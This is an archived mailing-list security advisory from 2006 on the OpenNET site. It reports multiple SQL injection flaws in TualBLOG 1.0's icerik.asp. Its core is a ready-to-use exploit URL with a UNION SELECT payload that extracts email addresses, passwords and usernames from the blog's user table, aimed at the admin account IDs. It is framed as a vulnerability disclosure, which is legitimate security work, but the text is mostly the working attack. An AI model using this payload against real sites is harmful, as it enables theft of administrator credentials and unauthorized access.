The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


TualBLOG v 1.0 multiple sql injection


<< Previous INDEX Search src / Print Next >>
Date: 13 Sep 2006 14:04:38 -0000
From: [email protected]
To: [email protected]
Subject: TualBLOG v 1.0 multiple sql injection
X-Virus-Scanned: antivirus-gw at tyumen.ru

# BiyoSecurity.Org

# script name : TualBLOG v 1.0 

# Risk : High

# Regards : Dj ReMix

# Thanks : Korsan , Liz0zim

# Vulnerable file : icerik.asp

exp :

http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1


uyeno = 1 or 2( Admin ID )

Bye :=) 



<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру